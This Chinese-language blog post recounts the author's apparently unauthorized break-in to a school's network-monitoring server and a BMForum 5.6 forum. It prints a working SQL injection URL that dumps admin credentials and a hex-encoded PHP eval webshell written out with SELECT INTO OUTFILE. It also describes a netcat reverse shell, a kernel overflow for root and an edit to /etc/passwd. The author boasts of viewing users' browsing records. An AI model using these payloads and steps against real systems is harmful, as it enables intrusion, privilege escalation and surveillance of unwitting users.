前奏：無(wú)意間拿下了學(xué)校一臺(tái)檢測(cè)網(wǎng)絡(luò)訪問(wèn)的服務(wù)器，無(wú)意間看到一個(gè)遠(yuǎn)程登錄的信息，遂對(duì)此網(wǎng)段掃描了一下80端口。。。

上個(gè)J8，就是那個(gè)上網(wǎng)檢測(cè)東西。。



其實(shí)記錄的很詳細(xì)，沒(méi)有加密的聊天內(nèi)容都可以看到。我還是比較尊重他人隱私的，所以只查看了一些上網(wǎng)行為。

剛才說(shuō)了，掃了一下那個(gè)網(wǎng)段的80端口，有一個(gè)開(kāi)著，就點(diǎn)進(jìn)去看了一下，是BMForum 2007 5.6的論壇，php的。

老系統(tǒng)了，記得前幾年爆了個(gè)注入，也不知道是不是這個(gè)版本，上db-exploit看了一下，艸，中槍了。



————————-下面的來(lái)自db-exploit————————

BMForum 5.6 (tagname) Remote SQL Injection Vulnerability

Author: ~!Dok_tOR!~
Date found: 30.09.08
Product: BMForum
Version: 5.6
URL: www.bmforum.com
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off

Exploit:

http://localhost/[installdir]/plugins.php?p=tags&forumid=0&tagname=-1′+union+select+1,concat_ws(0x3a,username,pwd),3,4+from+bmb_userlist+where+userid=1/*

# milw0rm.com [2008-10-01]



于是乎….



不用猜你就懂了，密碼是admin。

進(jìn)后臺(tái)了，這個(gè)模式我不是很喜歡，翻了半天沒(méi)找到能上傳的地方。上J8。



不過(guò)，還是好好找，依然能找到可以利用的東西，發(fā)現(xiàn)了這個(gè)后臺(tái)有phpinfo()和SQL執(zhí)行。

看了一下，是root權(quán)限，也得到了web目錄，如果沒(méi)開(kāi)啟魔術(shù)引號(hào)，可以考慮into outfile。

補(bǔ)一句：mysql的root權(quán)限在linux下一般沒(méi)什么用，有寫(xiě)權(quán)限就不錯(cuò)了，如果是windows系統(tǒng)，可以考慮導(dǎo)出udf.dll。





管理員百密一疏啊，沒(méi)開(kāi)魔術(shù)引號(hào)~~蛤蛤，大快人心！！~

直接select一句話(huà)木馬，然后導(dǎo)出到文件~~

下面那一段十六進(jìn)制字符串是www.dbjr.com.cn <?php eval($_REQUEST[fuck]);?> 的hex值

select 0x3C3F706870206576616C28245F524551554553545B6675636B5D293B3F3E into outfile ‘/usr/local/bmf/bmb/datafile/x.php’



然后成功得到shell。如圖。



接下來(lái)，試試菜刀里能不能執(zhí)行命令，下面就要考慮提權(quán)了。

試了一下，看似可以執(zhí)行命令，也得到了一些服務(wù)器信息。



2.6.9-22的內(nèi)核，有溢出。

這個(gè)終端有個(gè)毛病，就是不能即時(shí)回顯，畢竟是通過(guò)webshell虛擬的終端，所以，還需要nc來(lái)反彈一個(gè)shell，用于溢出。

這個(gè)服務(wù)器上已經(jīng)裝了nc，可是是閹割過(guò)的，不能指向bash，所以，下載源碼，編譯。

用wget在sourceforge.net上下載，就不多說(shuō)了。。

編譯什么的，也是so easy。實(shí)在不行就百度一個(gè)i386架構(gòu)下編譯的linux版netcat。

下面的工作就是要反彈shell了，一臺(tái)外網(wǎng)的機(jī)子是必須的，就算不是外網(wǎng)，能映射也行。

剛好手頭有個(gè)映射過(guò)端口的服務(wù)器，如果是外網(wǎng)服務(wù)器，就更簡(jiǎn)單了，詳見(jiàn)netcat使用幫助。

http://wenku.baidu.com/view/f77334ee19e8b8f67c1cb9fe.html

好了，開(kāi)始反彈吧。。。





很好，反彈成功，已經(jīng)可以執(zhí)行一些低權(quán)限的命令的。

接著提權(quán)吧。上傳了一個(gè)叫做“x”的程序，用于溢出。



蛤蛤，溢出成功了，已經(jīng)是root權(quán)限了，下面加用戶(hù)什么的就不說(shuō)了，你懂的~~

嘮叨一句，變身成root的方法。。。修改/etc/passwd



這是我用pietty連接ssh之后，查看passwd，已經(jīng)改成root了


作者 sunrise@luzix.com from：情'blog

最新評(píng)論